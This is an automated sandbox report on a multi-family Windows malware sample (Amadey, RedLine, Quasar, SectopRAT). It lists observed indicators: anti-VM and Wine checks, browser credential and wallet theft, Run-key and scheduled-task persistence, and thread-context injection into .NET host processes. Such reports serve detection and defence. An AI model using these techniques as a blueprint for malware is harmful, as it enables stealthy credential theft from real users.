Malware Analysis Report

2024-10-19 08:35

Sample ID 240731-bfvc3ssgkc
Target 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
SHA256 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
Tags
amadey 0657d1 discovery evasion trojan quasar redline sectoprat exodusmarket.io fed3aa office04 credential_access infostealer persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4

Threat Level: Known bad

The file 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe was found to be: Known bad.

Malicious Activity Summary


RedLine

Quasar payload

SectopRAT payload

Amadey

Quasar RAT

RedLine payload

SectopRAT

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Loads dropped DLL

Checks computer location settings

Checks BIOS information in registry

Executes dropped EXE

Identifies Wine through registry keys

Reads user/profile data of web browsers

Adds Run key to start application

Checks installed software on the system

Blocklisted process makes network request

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-31 01:05

Signatures

Unsigned PE

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-31 01:05

Reported

2024-07-31 01:08

Platform

win7-20240704-en

Max time kernel

119s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |

Checks BIOS information in registry

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |

Executes dropped EXE

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |

Identifies Wine through registry keys

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |

Suspicious use of NtSetInformationThreadHideFromDebugger

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |

Drops file in Windows directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\Tasks\explorti.job | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |

Suspicious use of FindShellTrayWindow

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |

Processes

C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Network

N/A

Files

memory/2688-0-0x0000000000E00000-0x00000000012B9000-memory.dmp

memory/2688-1-0x0000000076F70000-0x0000000076F72000-memory.dmp

memory/2688-2-0x0000000000E01000-0x0000000000E2F000-memory.dmp

memory/2688-3-0x0000000000E00000-0x00000000012B9000-memory.dmp

memory/2688-4-0x0000000000E00000-0x00000000012B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 c015c231f5d013a7031748f95129a969
SHA1 27f74431dbaa7b8bd16a5ddc0b871da65ea62849
SHA256 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
SHA512 baf6f0d3752e49ad769325bde85129d803094ea42e9d9735eafb3f415014e6d2f07a977d8892fef85307bc80e0060f0ef3c364ef3b6d05a0d4324956723a194e

memory/2688-14-0x00000000069F0000-0x0000000006EA9000-memory.dmp

memory/1096-15-0x0000000000920000-0x0000000000DD9000-memory.dmp

memory/2688-16-0x0000000000E00000-0x00000000012B9000-memory.dmp

memory/1096-19-0x0000000000920000-0x0000000000DD9000-memory.dmp

memory/1096-21-0x0000000000920000-0x0000000000DD9000-memory.dmp

memory/1096-18-0x0000000000921000-0x000000000094F000-memory.dmp

memory/1096-17-0x0000000002270000-0x0000000002271000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-31 01:05

Reported

2024-07-31 01:08

Platform

win10v2004-20240730-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

Signatures

Amadey

trojan amadey

Quasar RAT

trojan spyware quasar

Quasar payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

RedLine

infostealer redline

RedLine payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

SectopRAT

trojan rat sectoprat

SectopRAT payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |

Downloads MZ/PE file

Checks BIOS information in registry

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |

Checks computer location settings

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dropperrr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |

Identifies Wine through registry keys

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\471a98aee8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\471a98aee8.exe" | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2f7c1badc.exe = "C:\\Users\\Admin\\1000029002\\a2f7c1badc.exe" | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |

Blocklisted process makes network request

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |

Checks installed software on the system

discovery

Enumerates connected drives

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |

Drops file in System32 directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |

Suspicious use of SetThreadContext

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1492 set thread context of 5748 | N/A | C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 6300 set thread context of 8348 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 8164 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 8900 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 7992 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 9188 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 4228 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 8136 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 6276 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 6728 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
| PID 6300 set thread context of 6620 | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |

Drops file in Windows directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\Tasks\explorti.job | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\1000029002\a2f7c1badc.exe |

System Location Discovery: System Language Discovery

discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\1000029002\a2f7c1badc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dropperrr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |

Checks processor information in registry

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |

Enumerates system info in registry

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |

Modifies registry class

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\dropperrr.exe | N/A |

Scheduled Task/Job: Scheduled Task

persistence execution
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe | N/A |
